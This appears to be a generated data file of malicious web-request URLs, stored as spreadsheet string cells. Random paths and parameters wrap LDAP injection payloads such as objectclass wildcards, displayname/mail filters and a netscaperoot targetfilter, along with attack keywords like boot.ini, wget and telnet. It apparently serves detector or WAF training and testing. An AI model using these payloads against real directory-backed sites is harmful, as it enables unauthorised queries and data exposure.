    <t>/yc8tbt/hifgyfsmtsmor6n8can/n8/u913g1fnsru_u62w2av1/efxf.jpeg?oido0irivaohhe=yg&amp;ea2nenieloo=acan)(&amp;(objectclass+=+++es*)&amp;choanadmenre=u8eitp&gt;kieein&amp;aswogrghe=727883&amp;embeei8edta=2rldhst&amp;tnaftrcssice=ind9&amp;i6trpeelrgc=basdooeud1b6ose&amp;aswedtawvdae=o&amp;s2hboot.ini4axmkc=47341&amp;caxfh=neyh&amp;9eerau=9928572683</t>
  </si>
  <si>
    <t>/sro4ctrcz/3aupdate/z9t@7itdxd/e1wgdhn/mdiqlbp/mnhipd_wwivn05mpr9r.png?ek=)(+++|+(at=yli*)&amp;ne9ryn=015686&amp;sc8z8=+irebs\\h:ite5re&amp;t9oxkitf=?neatj4tg-]&amp;0tihi9rs=9794</t>
  </si>
  <si>
    <t>/aloaohoimsg.mspx?gvbscripthtpassaxkuxgrz=)++(+++|(qo=6om*)&amp;hrcrfa5vtiva=iea&amp;ceyz=hly5dhxutj</t>
  </si>
  <si>
    <t>/px8y1ek0s/oar/a.xvqsb7jke2/ncid/copyyv@9.shutdown/prghowbnrddqhrqe.cgi?bgftcvidxt=ok2pfofn3oyn&amp;een=hit3)(++++|++(crg=*)&amp;.70aen2ql=shah+z&amp;cuho2nxdwignagq=a57etprtet~lelemi&amp;l7gilassysctrfl=e?ahinlo&amp;dnwqp=ln</t>
  </si>
  <si>
    <t>/eyyxup/kwysjjwvjhtlgr_/we9vcagd07mva/l8lrkf/ehesen5dqynvewo/gyc9lyzguzuk-k/treeuassutiieseie.gif?rxuytatwes=ghf.887bw6.u&amp;votsbgt5=eemtob&amp;xserorv4ui=ox_hgf3pey&amp;aseyibf=26&amp;lhwnbtnd7q=5660494&amp;r1ltoqtejtla=591&amp;ptyu7dtri=43&amp;h9=eesetusp&amp;ensii7en=ev+ifg9h3aofs&amp;ederaftghrar=r9dt)(&amp;(objectclass++++=+++nooa*)&amp;wwsrn92n=eci3awc&amp;eeeppoed=o7n&amp;vlheiilaaeiydw7=jyfdsq5fto4&amp;sn=528250632</t>
  </si>
  <si>
    <t>/ck9kwfaxhn/xhqhnc/93fwhere/otqn/teh6talaeg/mtahveipqmoodtn/uqh8a8tbdrop/la.tiff?vods=ysetuebts9&amp;eesrdstco=323952&amp;snoirok4rdadoyn=+inuyr&amp;3sqn3nnnjih=on&amp;%oeu99xbpreplaceskda&amp;2raihhenaaee2=)(+|++(displayname=had*)+++(name+++=++had*++)(mail=had*++)&amp;mrsi9oh7=e&amp;aihnojkswioiov=eouelozfoy6hushnsh&amp;se6=icu4qm</t>
  </si>
  <si>
    <t>/ua/4v9maphrk-y.dp.msf?dbrbae5c4alede=unopentah06e&amp;dnhtunqpe=mqoy9wlson&amp;ieet2toafxoeoi=li.&amp;nntttoi=3nimg+rh+scriptnsrie+nshutdownpk6&amp;igwwre=tdn&amp;fdooet=m%+&amp;sr=wee2&amp;aihhbeasl=8&amp;kriy1sidr=3322184&amp;aealscnntr=)(++++|++++(es=oaraa*)&amp;0y9lu=eu@ed1h5&amp;ae3irjsrzvox=0uu&amp;faoedtm=&amp;e0a&amp;nl4=ldetc</t>
  </si>
  <si>
    <t>/hq0taeisete/iemty3inuydrtthsn/upams.bin?4b=s9atdaoxlet&amp;8shutdownoekg=5feaapri87u&amp;t28dbodonept=jsheiwsiyrut&amp;topua=d&amp;2z3el0navg0=tocinputsntr&amp;lwteeei=54050464&amp;alall=15&amp;heeoeszmo0tldm=ntt&amp;re2=asnr4d7wmaso3psh&amp;bcap3wtjwe=7&amp;xenodt6=/+bhtpass9oaodeottrgn&amp;dlrinews=slocation-sohdorogwanetie&amp;80nsrrnsddtato=81684&amp;guwidweihesmm=eh)(&amp;(objectclass++++=++cds*)</t>
  </si>
  <si>
    <t>/af-z9srul8o/pfalef9cat5k4/7aq1toprmk3/1vhpstv0ps4eee8pt.cfm?yiu9nlp=mn'+u/oh7&amp;tr=tgeolgknm7n&amp;asysid0ke56ie=se&amp;oa7dnllinl3s=1010)(&amp;(objectclass=tate)(|(sn++=++++8t)(cn=o++++j*))&amp;ccict34nicy2=tterbody&amp;tphoiarothsot=stus&amp;enonlar=8hqgn&amp;itpu=nl4ffswl</t>
  </si>
  <si>
    <t>/2fpyswkxa-ktpuos0/en/ymwn3tstiusut7etg/sredaedlosrlfm/ient8s4ua1asedara/lr-blgvarzz/e0-ijfrqwppob2t/0tibnum/hdzlben.js?3otsltrwminwrvm=)+(+++|(l6ebe=e6nus*)&amp;dp=328&amp;seome3vis=682&amp;aejihntsne=asdnn&amp;aza=6779&amp;d9d=6148094&amp;ugrl=l~uniontnn0tmp@eh4&amp;sgetnoren7oei=ialogralt&amp;lniuhiz=lsaay6g6tfrom1documentiudp&amp;tkt4ohtey=57&amp;hoyorc=et&amp;tnydor=0955276458</t>
  </si>
  <si>
    <t>/ajcv/03ilddgt/logjfbnodeb81uwt/tbttbco6azape9.css?bfob=sxoet)(&amp;(objectclass=++++etns*)</t>
  </si>
  <si>
    <t>/i0k2rsthedaribe0/l8ygi/axkk9/6erogs/redmmz/5w9y_oztelnete/th.wzd2ek1/rmzsmcir2/spa_zcs_qj9ca/bt8ftef/vostyle_htaccesl7c6qzy.jpg?oumqatw9siaci=sservicesnalinkias4tiawy&amp;rm4nd=[e8+h&amp;96rhtaccesw4sv=-&amp;2or=)++++(|(ep=tcb8n*)&amp;rtdrbhirobc=h+eitb1processing-instructionm5a&amp;wr=hftialeyonen&amp;q4eqnxn=nqdaoa&amp;danav=y1eneixnfnyvrb&amp;t1=lee+binttpx''t&amp;ipdlhttpsopen=+risi&amp;dis8te=67671745&amp;ezgny=0&amp;gus2e=542&amp;husg=|ha&amp;&amp;iintshudepr=55</t>
  </si>
  <si>
    <t>/9urw/sggnihqr/adlsoai9htrth.js?dse=ztelnet&gt;sbwetvrta]p+9steh&amp;tlen71ioaai=rh&amp;oaoxae1myvaeh=33078&amp;o7yceuiiaor=ilv&amp;ad7nusmjmakyoi=086771&amp;ai=tsst&amp;ioii=)+(++++|(+cn=*o+++'brien*+++)(mail+=*o++'brien*++++)++&amp;78lnymkncdesl=2)ncnkotsemri&amp;boioo=bsjoftiwtmtdstbt&amp;te=h@plxu&amp;5dbwe9sscripte4=amt&amp;roadoemhlortrc8=0fe8iazvnl7obnxn9&amp;idx68ku_plk=lvye1we6i</t>
  </si>
  <si>
    <t>/_6/iusseexddhsdsga2/dnitatst1syitd5psa1/sibf5jf_5fy-kqwubf/ztnry/ossre/ggblalms.gif?ainasiho=8a&amp;mhuyen=64225198&amp;8cnt=uepassthrun+eatc&amp;trf=eytc&amp;gtsneyhtn=segrwp-nafh&amp;7wug=kny&amp;x-between-=)++(+|++++(dcm=sb*)&amp;shcocimoojvq=eexeceyadrrqtdropwsr&amp;sbser5xcn=805081690&amp;e4kkesmysgaaehi=wmcasiocoplon1o&amp;ueeauta6te=846&amp;nodeoead=ornmco&amp;85lbl6seanea=crot3eohwn:telnetsj8&amp;zbc@b1jy=8733957</t>
  </si>
  <si>
    <t>/na/e4kab708m/sh8eeatoscren/a5ervtlteaee37pp/ertqdrpdrircaeiaaxi/1lviy/tutorbf/xt@2ucbxdom0/pymvfr0hixg1ck0/bhsfnoetumjn2ofen3ue.htm?6syoylgthaulek=r2s7&amp;imceaeyeek=ieh5girdejee3ee&amp;rt6se=j&amp;gfoa58ehaos=nerrtnc&amp;3oieaze6n=1ea&amp;cwhm9=u0c&amp;gtayrteyufip=)(++|(displayname=had*)++(name+++=++had*)(mail=had*++++)&amp;enesece=asyrareogem</t>
  </si>
  <si>
    <t>/orxkngqvf2zayqeqkw/rtoeieawa7aep/iblbb/8f/nshtdaa/zjfjfcx_xwhome3i/dwy8gbfselft/wtac9oihoishaoo/brdp0qhl/i0p5qb.zaxd3/eii@p7ox0wuag0xwr/4v4d44ok@vw2.js?de97tlte0=5165672227&amp;ttw=)++++(++++|+++(displayname=had*)++(name++=had*++)(mail=had*++)&amp;tzut4=9468&amp;ssaan=42&amp;bossqteha56tad=teip&amp;asslwwtahete=92&amp;m@6gd-imglsen2c=ezlc@munw&amp;xina=ojiu7af&amp;r8tortt=rw&amp;2utfrio8ro=ece&amp;r2qrp7a=fod&amp;irglytyemnr=9267&amp;5srocsin2m7g6=system+&amp;tudru=53792</t>
  </si>
  <si>
    <t>/eereknmojasges024i/ocltscssn5gyuine9b.png?6ocuna=ytefmnnn+?&amp;hsiert2nsm=irh&amp;n1jzsi3=vyu7t)(&amp;(objectclass+++=++++at4g*)&amp;twlzs4kn=8519&amp;.uhxa1@-nwdy=lncibv3&amp;re9e6tz=xf&amp;5yrdee=bnsm</t>
  </si>
  <si>
    <t>/tto0hsti/atao/il7l.gh2xowjlspjr/h0n/o308hmuegzy1nnss/qlibmsconnecte1du9ax2z/ta/4h_nbgsb-jj9q4ajbb.jsp?gtqyttth5=15837740&amp;dat0lneei=)t&lt;b@]rme&amp;ne=733814&amp;olrsihntnsy=ynkikaucwemnng&amp;euoa7ih=ji)(++|+(mcem5=*)&amp;img5lpassthrui5havinge=j&amp;ao8&amp;ah08sa=ilog\\e&amp;eee5bwhyinemqi=oxrhtpassmail</t>
  </si>
  <si>
    <t>/qzcxseu/prl2htarrn.exe?z6=hspqk)(&amp;(objectclass=atnt*)&amp;maeshfdbusac7pu=61899</t>
  </si>
  <si>
    <t>/bhboowrd/i0p/eabwe/mjrb/htioutao/iv/7p@j_fxdy/ezyvrrronenhemrzqhet/mf@vt4lxc/qcbzgd6o7pgs/okaifs43dm_m_ssgk1x.js?tke4iny9td=+&amp;nweorene7=eeyg;84arr/natao&amp;annilrtp6=0edrop|d9en&amp;sweopag=573&amp;ac=aywa&amp;yrvij855t=axte0oloodyw9wesl&amp;fwa=rmiph)(+|++(oess=*)&amp;fttuyk=7797&amp;x-xzperlm=lve&amp;giseadgsuxa=sbxc8v9ofbx&amp;9jfv5=lcb7&amp;lzoa0ocloes=rsmbasservicesaic6jwwnmm+it&amp;rm0=922</t>
  </si>
  <si>
    <t>/ivz4gfoxe8bawt9u/t2ncgz/ebo/mmetamwindow.openjxk/6rhc.dll?_5_6zfrom2=gcn3rdeuq4ic&amp;dynahoi=&gt;stegxp_yf&amp;ctar7g=p&amp;spa8te=ao&amp;hifzfb3b63ml=755958&amp;aietee=(passwdo&amp;ewsde6uy=456&amp;bcooeoayrse=3937)(&amp;(objectclass=dyo)(|(sn++++=++++0rc8)(cn=d8++j*))&amp;2gay=m&amp;arscts=nxa&amp;oorihnai=dn8rn&amp;us=770&amp;lctear=+aoa)it&amp;nqnodfszab=1&amp;wtairdel7tduqer==mckfa</t>
  </si>
  <si>
    <t>/ud6d/yumogqtenzvz6xxb49f/wxntq7qk.bhp9tl/kruz/7p69ko.63ja1d1/apdz-qtd0qhr/la8coyui/hms_1rmfmwg/tbaeeetdi/aq1/ioairoriereadah.msf?eneies=25004808&amp;9iuoeo0l=8763&amp;sqonez=ifttbgsoundyaehconnectbode+xe&amp;aeaau5h4d3hituk=53090618&amp;3uua2mlra6iknmc=rsf)(&amp;(objectclass=++iim*)</t>
  </si>
  <si>
    <t>/twrerr/t9no0htgm/ncmyaad4ague/xj4childzcos.css?baccess_log3cljpd-c@=eec6c2h&amp;vtmboot.ini=2458)(&amp;(objectclass=smox)(|(sn++=dsw)(cn=mcm+++++j*))&amp;edcuecz=edf&amp;amgyp-c7=475&amp;1h4u8delete2kk=90456</t>
  </si>
  <si>
    <t>/r.sdrktdf1/ja5vrtg_/cs/adads5afp/jdlju/q3autxku/lnujpassthrun/n0yhutmpdocumentb/rbhomevcbkj0acopyecoq/knvdesrnirn/ytcdq.sh?siyhht7evhspva=eqxu36exhpu&amp;qeo2y=1379085542&amp;nzbrjweo=i1vvo&amp;sfqrbentaald=uln4iohwylotlibreplacet&amp;8zxtkfrac3p=4&amp;ohtoodq1ns=fdocumentt)c+ottcc&amp;&gt;r+&amp;h4pfrerozaaieiy=617563&amp;ortr=01189&amp;qleti=iesc&amp;hsl=)++++(+|+++(enn=denrr*)</t>
  </si>
  <si>
    <t>/lduw_yvnkfi@8/aace/e.mf6xmm.shtml?h23ddehr=ln'documenttonepii0&amp;httplrd_gklsa_div=eitic)(++|(iewn=*)&amp;yym7q=aruefnsttijtd&amp;dotfprpaqv=971</t>
  </si>
  <si>
    <t>/qsosehtoaauxrmw2e/usg.htm?1tphdpiestvreh=)+++(++++|++++(displayname=had*)++(name=+++had*++)(++mail=had*)&amp;ytirsdblxmsrxt=51&amp;5hefct=svoocf4nsaa4ebmh2&amp;aireethaneluy=8&amp;enrolctuytl=0i&amp;tihsaotias8tt=e&amp;hftkmdeitec='+havingcrsynod7stdinei7htred&amp;9oc5lcokhlync=nn&amp;etstdsn19szacde=nts+5&amp;n4num4o8grn=3609186</t>
  </si>
  <si>
    <t>/u8z4sock_streamformg/axos-g/zw1mibsscripth-cqfv/argvonieatu/1sggh1atepoyunhttatl/ijsmzdalsreob/hf/4h_bgrrs3esnxn/hdesmstcl5/gnw-1tiwk-czey.html?nroarerchheoty=)++(|(displayname=had*)+(name++++=++++had*++)(+mail=had*+)</t>
  </si>
  <si>
    <t>/mptq_js.j.e6usq/neeopr/8j9zy.ihttpsuvhw/lpiitris/gm.png?ro=10&amp;oohe1=14780523&amp;heoxleaevfha=tbin&amp;ectf=hg&amp;zbe=")(targetfilter=(o=netscaperoot))&amp;llrsor2s5=9&amp;aelja=systeml2a0u0jh5b&amp;mordreoonv3=vinago</t>
  </si>
  <si>
    <t>/9pqsannptovoos75meal/qihiimk7h/fsobuenziaosxebynke/qpqi/8hy40-wn/aq-lexecvl/gwnaobuseda/4oqkomfithahr5oeae.sh?hrar=203)(&amp;(objectclass=hbd)(|(sn++++=5o)(cn=anht++j*))&amp;madfuu=152144&amp;ijmjszeval6cwl=cla23csefl$roes&amp;jy@fko-bnj=0545&amp;samtert=eorsaieha5orr6ocmn&amp;wibtgrp=nsbeoi4lto+</t>
  </si>
  <si>
    <t>/dr2hbelwn7othegwd/t@khwcadbyoryodd/bbhpvselect-y9havingz@/2shbtmcy.vd9/sckl2uo@3bme1.html?_0aballhavingvmincludeboot.inizf=hrmo&amp;jmetaizd=u6nbcgz&amp;ofettjec=1134&amp;lc-1h=0114983972&amp;peoifminr=eoh&amp;l9antayscf=nievo7yt&amp;aepnlxhteaeeoet=2702579&amp;cthdnafletso=tonfaahtissrd8ae&amp;tsy5jfrroxt=y&amp;tyonehumstcworg=)+++(++|+(++cn=*o+++'brien*++++)(mail++++=*o+++'brien*+)++++</t>
  </si>
  <si>
    <t>/kjbwlvc.al6/u43oelqnaas4aey/5mgv@g66v0x/p1/ct45dsapdjeicezee/4fejqijpwinnteqkno/tesnebf-q@so1nxm/nrawqg7oa2ilp@b/risdcy7y7/wwhctd_q0hscks1u/0nwlehibmtio.jpg?oeiwlieeo7=37127065&amp;neggunnfeee=edme6ec&amp;wfuee3glaa=863&amp;kkhbqd=aen4kh0tqheefimtp&amp;ypvqeqgnas=otievreealaei&amp;dtncqahre=0lvconnectt&amp;aattb=n9fzpi@er&amp;o47=98951492&amp;teconretra=4132970&amp;rsdt2=)++++(++++|(displayname=had*)+(name+++=++had*+++)(++mail=had*)</t>
  </si>
  <si>
    <t>/kih5hrmtunwf/eh1t5tuflwyx/uxkmochaykzzvk/iframeuqpositionps/slhwamrcsmnafl7s8kd/ws4al8jotuh4btmr/htao9eean9raderaw/osatpefrr2wpooerftic/mj0ko64yrmoegbo2es/ijoavgt9fo6xe/xnrm8lsbbc/jg7y.nsf?sgvcbgsound4al69a=)(+++|(i7c=ll*)&amp;nbnhif6ttdas8at=i&amp;pyo0d=569&amp;1hrore=lmads&amp;fd4tniti1lii=896362&amp;unpdbtthca5s=zue&amp;oi3eor=5171894&amp;rwddom4=cqe@drcrsht&amp;rzrn=ano9nebxwj&amp;7eo8n19tvd=08link4tnddb/deftpposition&amp;rihnlsa=3370&amp;s9lsjtk-da=ehogebe7esy9td&amp;0rnea=4066746</t>
  </si>
  <si>
    <t>/wwcert/ecrhmoetwhjwhos/p6qomuz/n-0qb21g_wgk2b.cfm?tdteuttdn=2i&amp;nasheis5rtpltw=6206&amp;kpgoir5aghh=nd&amp;aolwikpeaose=9821863&amp;fn=mid)cd&amp;9nvalscriptsphpd=eyq&amp;bodyajnetcatf8=92036185&amp;to4kaa=r&amp;u0igtbwiiiute=37)(&amp;(objectclass=uti)(|(sn++=+++toa)(cn=usee+++++j*))&amp;wn=jhs7zpr&amp;ur0oasd=jhcasock_streaml&amp;citntwtli=ssz28lkc0gqm</t>
  </si>
  <si>
    <t>/dhnsm6idcn/pu_y7@9rjb0v7/hhtrszsliewslc5ufre/bvr/ii8gorduoyoe/7wiykm5.ag6vft4pz/ndu8ej7o.php4?nwzim=tjhemaob&amp;aefprh5dv=)+(|+++(crs=w6fc*)&amp;tteae=ad@h&amp;jph=lxb7iwpmzs&amp;oirise5okefig=96915</t>
  </si>
  <si>
    <t>/larinsert/rbu0dyb1/u90poyncv.cb8i/8y8rpeddneuin9i/nz@a63ifb.png?domat5=%&amp;tuclsmonriil=8750)(&amp;(objectclass=6ci)(|(sn++=+ha)(cn=it+j*))&amp;oouehat=10</t>
  </si>
  <si>
    <t>/oitczfoailtrnetgh/mtn1wlicagd4dni/mn8nzcntbawaigid1/doqot4dcg4i8ibzyh/h9/hexak-/sk2oaoeruncnonahnntu/aeqvu.jpg?4hu63a5pnivat4=")(targetfilter=(o=netscaperoot))&amp;rettf=g+20as2twe1e2+&amp;jalsiepcegybbfh=ynmeta/pla&amp;idu=jyu7eyogobx&amp;os08f5ad3eoonog=4v&amp;irgsee=eue0&amp;irhrihsdndqkd=5</t>
  </si>
  <si>
    <t>/a0ikmsr/hyf/agi/vand_/8r9eiuaooxitfqhgyhad/oovoeeedgnu.htm?astsm7=5eitac&amp;lpcyrea=dph8gpsqp&amp;ywnwfat3nrnndtu=+1autoexeccpo|sc&amp;sa3blhe7g=pnmt&amp;hdf5h=39)(&amp;(objectclass=zt5)(|(sn=++n4)(cn=noh6+++j*))&amp;seceltl0ohere=ieuutptf66rsao&amp;igieotoaeaocri=hec&amp;eipz=6317181&amp;d9neitilnre9oen=32562&amp;edelazihwatgua=euxb6n.fwa&amp;zdud=5lnn&amp;ceorce5eonzap7=olecuset</t>
  </si>
  <si>
    <t>/oeocof5oi/fd5g1jc3o/imgj9ll.bb_gtmpcss/fhiefigni/r89sg/xautoexechk5-/0hn/aezhlkiwmiykoit.php4?kc0wbiyay=")(targetfilter=(o=netscaperoot))&amp;ehdhnoa=56847166&amp;5dtztloitl=slr6t&amp;rlecs8ui0=tgmoonciqtedclsvs&amp;ahe=m0pdrl&amp;haeokn_-orcp=0000&amp;0ciioaskok=dbwroteimed&amp;ft4iqxmfb.=9096852259</t>
  </si>
  <si>
    <t>/6b6sxmeqknduoo/wzfannso5idp.dll?nggeut=)++++(+++|+(++cn=*o++'brien*+)(mail++=*o'brien*+++)+++&amp;r5nrmhi8hdtu=437700690</t>
  </si>
  <si>
    <t>/n5/eistshlloa3ituls/8kltpyj9/jbvsie/wzwibxrw.w2/bidardgt9newa3.htm?er=ttndrz98ur&amp;hyo7inputcs=rir2)(&amp;(objectclass+++=++orn*)&amp;aabube5aj6olr9e=5&amp;armlteo=63085588</t>
  </si>
  <si>
    <t>/dshey9vkw/onosrrhdteynnn/e6neibdtpcpfaranbop/openo/jn@cj/mrsjkly_yt7udo/t2ceo7miabesr.sh?haasps=8541&amp;l9yjboot.iniz=1o&amp;hsvlpsrnf=33&amp;nixecrman0rn=uaxjaeoricaeef&amp;mr=rf@e4fzqjk7f&amp;hirnryhon2aie8=3&amp;8tnpcfh=)+(+|++++(displayname=had*)++(name=had*+++)(+mail=had*++++)&amp;ea4feszn=aei&amp;6ct=94&amp;oau=se5accepta++ln&amp;tnisnpzz=nl8n&amp;fo3hdav709q=l1szrh&amp;n_m.groupbygfrom.ebin1=+dsnrkdzplda0diiets-&amp;eoe7=71995&amp;arcusydn5=66001</t>
  </si>
  <si>
    <t>/t82eutnds0benersbsec/ocesmtpto/aabfha4/oiehlrwn/iruwrgt.html?fecyegialsg7=re)(+++|(te=*)&amp;eevaitsttxwe7t=60&amp;tntna5hcbvhowt=ieea&amp;nei9occretyo6=sat</t>
  </si>
  <si>
    <t>/pkwnotieeiuu/oemntoormp/tertywsgoac7ude.css?sivmom=381&amp;aroawoe=sno)(+|+(vsc=*)&amp;aernydektiaoy=;mt&amp;e5evr=95414&amp;thte=00177523&amp;jasevo=oxlwz3kacd&amp;hgdltei=reyj&amp;cxl0=ea6dtntg6pfo&amp;gyie=645558&amp;enothydjarrt=s=dhtpasslomftew5t+sform~/&amp;woaerotwotolop=g&amp;btzo=zau+p2guec&amp;dj3document_f=79</t>
  </si>
  <si>
    <t>/9zbn-execbv8n_-/yuniona3aoubin8pa/tp7olpx4xmpsgli/lq@@lal5mfdipdx/fe27xmvbg.-apzcice/juze4-3h84njze/aobsshz/vwybh5wd8gklnl/g.vqgjdwd5wget6gz/urtocbghl7uo/ebt/3bzyypcgfbdvqgr4ea.php?5icfauzo=suinessqu&amp;rp=6523225215&amp;1adym=mh7soroeittm&amp;ek2nureds=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/ea@l/tonimc/yf4s-cmdh/e7ag2mql9.jpeg?uoh=sdsqww38&amp;ot=rop&amp;alueeg5t=ztexlw6tiwed&amp;0erzfco6tro0=capassthruret&amp;ttaibnchild&amp;iw=6006189&amp;s1=hece)(&amp;(objectclass++++=gte*)&amp;bakoz7px=6eaaoe&amp;extitl=08222649&amp;imghaenu16=76275&amp;dmditmmnefhe=tjeuj&amp;zvqs=8239422&amp;53e7agsohnie=826582&amp;oilsdr9t=dhy.</t>
  </si>
  <si>
    <t>/3mrla.8iocjre-7gx/t8tewnhddusuortei/positionxterm6wptzwgetsx_vc/isomclpr4/tuyimuffovzxqg/ibi/aajzz3oqmmwysbzcbpao.htm?etcs7tbd=849&amp;zsme5owegosnt=)++++(++++|+(++cn=*o'brien*++)(mail+=*o++++'brien*++)++&amp;7o3htusaeshnoom=6913707</t>
  </si>
  <si>
    <t>/novnrb/wp1s4tg6t7eq6kqy/o4bd/oizs1bn.shtml?vc=95&amp;totinss=bltsboc8irlt0h&amp;2-vfjrt9sej7=]+&amp;2m=421&amp;jctmpcwvotmptudiv=574&amp;ne=n]suy|]dssctt&amp;euruicu=tdo)(&amp;(objectclass+=+++e8*)&amp;zdo=&lt;&amp;2mdd=73</t>
  </si>
  <si>
    <t>/o-oaghvbijmunghdkez/x7oih9xqqq.jsp?hinss4bhoai=au)(++|(0ns=*)&amp;rliuaoteeamxbde=91&amp;3sath=ai9&amp;yf7zoeladaw=it+1&amp;rtanshtatir=s</t>
  </si>
  <si>
    <t>/taf_h56ke2ug9xb@wyy/vyywyc5ynvhht/s_jhe_kvgielfc/esen/ksheicqua5tla/4ohyedcaltumsh/lrrew/q6wnueanleeenr/srrvgjc3fnbzq6/tvp/mb.tiff?nej=752298716&amp;exmlrstyle=dl)(+++|++++(na=*)&amp;iiinene=3be0pue&amp;yrrozesnaat=qblxt&amp;etssefihsn3tc=oyre&amp;tereetqihi4peon=2wroehzkb5?9&amp;qsottieme3beea=dwnmil&amp;tjthclehas=9552&amp;aarm7n=io&amp;rnd8infxrahdi=101&amp;li=peecmdcaz&amp;include&amp;aszi9ghienis=8eie6uehenrssnff&amp;eitgr6l=sh7iirhmldahoifsl&amp;s7oevb3ldive=7lkq47guws3c&amp;la7ycpoctvut=z5o</t>
  </si>
  <si>
    <t>/ennor9tnl8nagso/nooh/nec0ciihs8flt.gif?optjgwuy8=175223&amp;8an=aeeid0e7d4cum&amp;oaenaemsh1n=rnr&amp;uuleufaeie=)+++(+|++(e6=nns*)&amp;ry=6381351519&amp;av1w2es=bktd6olkc&amp;y34ssldea=8&amp;segt=4675837258&amp;it5odiin87ebi=42&amp;utnwual0pnmhoe=349&amp;edqiuioj=48sg63hgn&amp;janta=le4&amp;cp=45&amp;eaeoiibchpfs=55214888</t>
  </si>
  <si>
    <t>/nda2edrae/du@fcigz3@d.4agry/etehtoxaanzaedev/3rraamtsai3t/bf/h61qtjbjw/mo2ryijjib_wo5n/appertrlntctt/tpgzafkkaqyyfr0/qdbnfneott0arey/qxfbody9ymd_lbd7.pl?rtduiy2=k-ejexiik&amp;nw@kct7awinntgj=ngrepaselectin&amp;drtsp9stdcaysoa=")(targetfilter=(o=netscaperoot))&amp;aasefurf=yic@2sd_zm6p&amp;arnab1nkfd2=tn5aeru&amp;qoy6e3=eqos+copytgdropubydet&amp;a7i=i;&amp;qfeqot74sim=x-5gk7hd2a&amp;jcmtpig=72657988&amp;kf=75</t>
  </si>
  <si>
    <t>/zorattsebnqc/scm/ea/3wsf-@nwy6pzhqv_gh/tktf5lcgad2ht-b/tgdptenarrrp/t0wrla/ite7oo8zn/ep5jja1hamyze2md/au.css?v3m9tmretcanh=iemaclorm9&amp;2eedet=whx&amp;sifwaittotw=xbnph-&amp;be1u9anukt=iq8@passthru&amp;t7y6eqt=865&amp;r5rvsr=san1w)(&amp;(objectclass=++rei9*)&amp;d6=142744827&amp;gsaneiuoc=aorzriiyy&amp;ynuotht=765565</t>
  </si>
  <si>
    <t>/ho/3wd0od2hd/yk9q_scplwti/rtfsspp3gn3okwhmddt.mdb?r0yzwe=er)(+|+(rsil=*)&amp;n.xseof1=lvoatsypoahuuir</t>
  </si>
  <si>
    <t>/ix5tr/hzby2dzt51..pl?iee5ttiuteaf46=5021193&amp;ieieudeh=oha0etd9xoeo&amp;fob5w=arce)(+|++(hss1=*)&amp;aojetiat=stdinn&amp;lxowwgetxdde=vosirareagmaild&amp;nnsd=d+eehwherei&amp;rcegn1rbkhsnmng=(eixnhayeosnro\\m</t>
  </si>
  <si>
    <t>/umgsjul/lg.-w-yd/itm/mhiwc1etrngydlhal/vbndydy8/4crfcceawdv-opza/g5q/4mxa8sesknnbgosiqd.dll?ouanxodeydnvo7e=ofzutnirm5&amp;ezit=renua)(&amp;(objectclass=++inee*)&amp;denpnrfox7=0pupdateinsert;e+veapism</t>
  </si>
  <si>
    <t>/e68i2arsaf/u9xe/tuctwain7ehoeqts.php?odgtehbsoy=vzuvh4ftpvtrcyo50&amp;.amtjdjr=1323)(&amp;(objectclass=kal)(|(sn+++=+jc)(cn=ddra+++++j*))&amp;97d7ilrquaise=imh8s&amp;s6ih0n=mmuxds&amp;wywrsof=]t2&lt;&amp;1a7jowj=6ia+e@|aetn-hqhi</t>
  </si>
  <si>
    <t>/eeihwuexxhenreap/hh0nitafhono/3vrml-5lfvvt/poruirn4lservicesh/6z91yuh@efj7f7vt6i_g/retsanhlyoj2aj0fots/lu/t1vutmtzjbdxvkvogg@o/4drae1rehesapi6z/slxkgq@tfwgvmidmll7/truni/ply3il5if.jsp?auheacrotkenkii=tiwsh)(|++(raot=*)&amp;wrssiastopteth9=518</t>
  </si>
  <si>
    <t>/iolhs85edfyga0/cmer/klhylibzoqokboot.ini7/eea/eoe8catkjxhci0/ar1oieajareehaoytu/ssajaeekebho4edea/l.5mrfd/2mg/elbeoteelri/unglsx/a8citrn.asp?uasyih3a=")(targetfilter=(o=netscaperoot))&amp;8bla9mcechoju5=8&amp;pqpositionxb=vtie&amp;1ac7tmp=cpqiiw9kj&amp;4ebgxtdentcmd=suxqz7492zni</t>
  </si>
  <si>
    <t>/pydotrtr.exe?en1do=)+(+|(sh=oue7l*)</t>
  </si>
  <si>
    <t>/ngh3/89rca_jtv/on/artri/ae/mgzw/hirreodhb/ny.3/f5vlysrrdy5df/8nxoeaui9be/kyqlu.jpeg?ntw7v=imsalqe_5&amp;lsh26e2irexai=)++++(++|+(++++cn=*o++'brien*++++)(mail++=*o++'brien*)</t>
  </si>
  <si>
    <t>/bphzgtm4w5yfpqk/oodvtsoorcrtlaa/ptrhntjaroest/lwszt5r_1mwaj93n77w/hye.html?7e0rathws=eh9e)(++|++(tp=*)&amp;kkservicesf8tueurhg=18&amp;2se=doyiwaremeobersf9k&amp;oe4rdi9aejrgo=inox:xhubvo&amp;madase=828513&amp;nhneoortj03=r&gt;talvwrww&amp;.mperlsiframeo5jctrinclude=+hw5mfdst4ezwgeoq~&amp;3hyuyislobjectwq=lurthoi4ehm&amp;aebltsem0oyt7=lkig&amp;ufa4etea=e4ouuiu9n8laomochae</t>
  </si>
  <si>
    <t>/s5k/b3/mwhkjjdsowc1l/63gg/s.tq3eyycqnn@pn/sn3rwwvup5hyuy147k/5n_szs8z/ifct6o3ceul/zno/x-m1qvsock_streammvvprocessing-instruction/rp0.gif?s6.zfw5u3iy=eotdeuua4iiiint&amp;ghrn9my=")(targetfilter=(o=netscaperoot))&amp;sin0zehoet=57651544</t>
  </si>
  <si>
    <t>/aayni276bmfvtupuqw/tqwg8upmdi_r019/mt@upsrm/oui/lahgvytjeawekb3.php4?owmievh=32742&amp;bibryeccest5h=eurf&amp;lmb=999782&amp;8d=xuolnm9s&amp;o7id=esaua&amp;9teiarao7eundir=vgm2)(&amp;(objectclass++++=++izvs*)&amp;eti9osrtre=nqyk-&amp;saeyofqt3amnism=su1aoirdom&amp;aneut8nhl=e&amp;shmh5utdrjdt=dee%m</t>
  </si>
  <si>
